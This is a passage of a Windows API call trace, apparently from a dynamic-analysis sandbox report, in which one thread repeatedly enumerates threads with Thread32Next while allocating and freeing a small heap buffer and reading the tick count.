[0182.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.500] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.502] GetTickCount () returned 0xdee7 [0182.502] GetCurrentThreadId () returned 0x264 [0182.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.502] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.503] GetTickCount () returned 0xdee7 [0182.503] GetCurrentThreadId () returned 0x264 [0182.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.504] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.505] GetTickCount () returned 0xdee7 [0182.505] GetCurrentThreadId () returned 0x264 [0182.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.506] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.507] GetTickCount () returned 0xdee7 [0182.507] GetCurrentThreadId () returned 0x264 [0182.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.507] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.509] GetTickCount () returned 0xdef6 [0182.509] GetCurrentThreadId () returned 0x264 [0182.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.509] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.510] GetTickCount () returned 0xdef6 [0182.510] GetCurrentThreadId () returned 0x264 [0182.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.511] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.512] GetTickCount () returned 0xdef6 [0182.512] GetCurrentThreadId () returned 0x264 [0182.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.513] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.514] GetTickCount () returned 0xdef6 [0182.514] GetCurrentThreadId () returned 0x264 [0182.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.514] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.516] GetTickCount () returned 0xdef6 [0182.516] GetCurrentThreadId () returned 0x264 [0182.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.516] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.517] GetTickCount () returned 0xdef6 [0182.517] GetCurrentThreadId () returned 0x264 [0182.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.518] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.519] GetTickCount () returned 0xdef6 [0182.519] GetCurrentThreadId () returned 0x264 [0182.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.519] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.521] GetTickCount () returned 0xdef6 [0182.521] GetCurrentThreadId () returned 0x264 [0182.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.521] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.523] GetTickCount () returned 0xdef6 [0182.523] GetCurrentThreadId () returned 0x264 [0182.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.523] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.525] GetTickCount () returned 0xdf06 [0182.525] GetCurrentThreadId () returned 0x264 [0182.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.525] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.527] GetTickCount () returned 0xdf06 [0182.527] GetCurrentThreadId () returned 0x264 [0182.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.527] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.527] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.529] GetTickCount () returned 0xdf06 [0182.529] GetCurrentThreadId () returned 0x264 [0182.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.529] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.531] GetTickCount () returned 0xdf06 [0182.531] GetCurrentThreadId () returned 0x264 [0182.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.531] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.532] GetTickCount () returned 0xdf06 [0182.532] GetCurrentThreadId () returned 0x264 [0182.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.533] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.534] GetTickCount () returned 0xdf06 [0182.535] GetCurrentThreadId () returned 0x264 [0182.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.535] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.537] GetTickCount () returned 0xdf06 [0182.537] GetCurrentThreadId () returned 0x264 [0182.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.538] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.539] GetTickCount () returned 0xdf06 [0182.539] GetCurrentThreadId () returned 0x264 [0182.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.540] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.541] GetTickCount () returned 0xdf16 [0182.541] GetCurrentThreadId () returned 0x264 [0182.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.541] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.543] GetTickCount () returned 0xdf16 [0182.543] GetCurrentThreadId () returned 0x264 [0182.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.543] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.544] GetTickCount () returned 0xdf16 [0182.544] GetCurrentThreadId () returned 0x264 [0182.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.545] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.546] GetTickCount () returned 0xdf16 [0182.546] GetCurrentThreadId () returned 0x264 [0182.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.546] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.548] GetTickCount () returned 0xdf16 [0182.548] GetCurrentThreadId () returned 0x264 [0182.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.548] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.549] GetTickCount () returned 0xdf16 [0182.549] GetCurrentThreadId () returned 0x264 [0182.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.550] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.551] GetTickCount () returned 0xdf16 [0182.551] GetCurrentThreadId () returned 0x264 [0182.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.551] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.553] GetTickCount () returned 0xdf16 [0182.553] GetCurrentThreadId () returned 0x264 [0182.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.553] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.554] GetTickCount () returned 0xdf16 [0182.554] GetCurrentThreadId () returned 0x264 [0182.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.554] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.556] GetTickCount () returned 0xdf25 [0182.556] GetCurrentThreadId () returned 0x264 [0182.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.556] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.557] GetTickCount () returned 0xdf25 [0182.557] GetCurrentThreadId () returned 0x264 [0182.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.558] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.559] GetTickCount () returned 0xdf25 [0182.559] GetCurrentThreadId () returned 0x264 [0182.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.559] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.561] GetTickCount () returned 0xdf25 [0182.561] GetCurrentThreadId () returned 0x264 [0182.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.561] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.562] GetTickCount () returned 0xdf25 [0182.562] GetCurrentThreadId () returned 0x264 [0182.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.563] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.564] GetTickCount () returned 0xdf25 [0182.564] GetCurrentThreadId () returned 0x264 [0182.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.564] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.566] GetTickCount () returned 0xdf25 [0182.566] GetCurrentThreadId () returned 0x264 [0182.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.566] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.567] GetTickCount () returned 0xdf25 [0182.567] GetCurrentThreadId () returned 0x264 [0182.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.568] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.569] GetTickCount () returned 0xdf25 [0182.569] GetCurrentThreadId () returned 0x264 [0182.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.569] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.571] GetTickCount () returned 0xdf35 [0182.571] GetCurrentThreadId () returned 0x264 [0182.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.571] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.573] GetTickCount () returned 0xdf35 [0182.573] GetCurrentThreadId () returned 0x264 [0182.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.573] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.574] GetTickCount () returned 0xdf35 [0182.574] GetCurrentThreadId () returned 0x264 [0182.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.575] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.576] GetTickCount () returned 0xdf35 [0182.576] GetCurrentThreadId () returned 0x264 [0182.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.577] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.578] GetTickCount () returned 0xdf35 [0182.578] GetCurrentThreadId () returned 0x264 [0182.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.578] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.579] GetTickCount () returned 0xdf35 [0182.579] GetCurrentThreadId () returned 0x264 [0182.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.580] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.581] GetTickCount () returned 0xdf35 [0182.581] GetCurrentThreadId () returned 0x264 [0182.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.582] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.583] GetTickCount () returned 0xdf35 [0182.583] GetCurrentThreadId () returned 0x264 [0182.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.583] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.584] GetTickCount () returned 0xdf35 [0182.584] GetCurrentThreadId () returned 0x264 [0182.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.585] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.587] GetTickCount () returned 0xdf44 [0182.587] GetCurrentThreadId () returned 0x264 [0182.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.587] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.588] GetTickCount () returned 0xdf44 [0182.588] GetCurrentThreadId () returned 0x264 [0182.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.589] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.590] GetTickCount () returned 0xdf44 [0182.590] GetCurrentThreadId () returned 0x264 [0182.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.591] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.592] GetTickCount () returned 0xdf44 [0182.592] GetCurrentThreadId () returned 0x264 [0182.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.593] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.594] GetTickCount () returned 0xdf44 [0182.594] GetCurrentThreadId () returned 0x264 [0182.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.594] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.596] GetTickCount () returned 0xdf44 [0182.596] GetCurrentThreadId () returned 0x264 [0182.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.596] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.598] GetTickCount () returned 0xdf44 [0182.598] GetCurrentThreadId () returned 0x264 [0182.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.598] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.599] GetTickCount () returned 0xdf44 [0182.599] GetCurrentThreadId () returned 0x264 [0182.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.600] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.601] GetTickCount () returned 0xdf44 [0182.601] GetCurrentThreadId () returned 0x264 [0182.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.601] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.602] GetTickCount () returned 0xdf54 [0182.602] GetCurrentThreadId () returned 0x264 [0182.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.603] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.604] GetTickCount () returned 0xdf54 [0182.604] GetCurrentThreadId () returned 0x264 [0182.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.604] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.605] GetTickCount () returned 0xdf54 [0182.606] GetCurrentThreadId () returned 0x264 [0182.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.606] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.607] GetTickCount () returned 0xdf54 [0182.607] GetCurrentThreadId () returned 0x264 [0182.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.608] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.609] GetTickCount () returned 0xdf54 [0182.609] GetCurrentThreadId () returned 0x264 [0182.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.610] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.611] GetTickCount () returned 0xdf54 [0182.611] GetCurrentThreadId () returned 0x264 [0182.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.611] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.613] GetTickCount () returned 0xdf54 [0182.613] GetCurrentThreadId () returned 0x264 [0182.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.613] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.614] GetTickCount () returned 0xdf54 [0182.614] GetCurrentThreadId () returned 0x264 [0182.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.615] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.616] GetTickCount () returned 0xdf54 [0182.616] GetCurrentThreadId () returned 0x264 [0182.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.616] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.617] GetTickCount () returned 0xdf64 [0182.617] GetCurrentThreadId () returned 0x264 [0182.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.618] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.619] GetTickCount () returned 0xdf64 [0182.619] GetCurrentThreadId () returned 0x264 [0182.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.620] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.621] GetTickCount () returned 0xdf64 [0182.621] GetCurrentThreadId () returned 0x264 [0182.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.621] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.623] GetTickCount () returned 0xdf64 [0182.623] GetCurrentThreadId () returned 0x264 [0182.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.623] Thread32Next (hSnapshot=0x594, lpte=0x30ff434) returned 1 [0182.625] GetTickCount () returned 0xdf64 [0182.625] GetCurrentThreadId () returned 0x264 [0182.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0182.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0182.625] Thread32Next 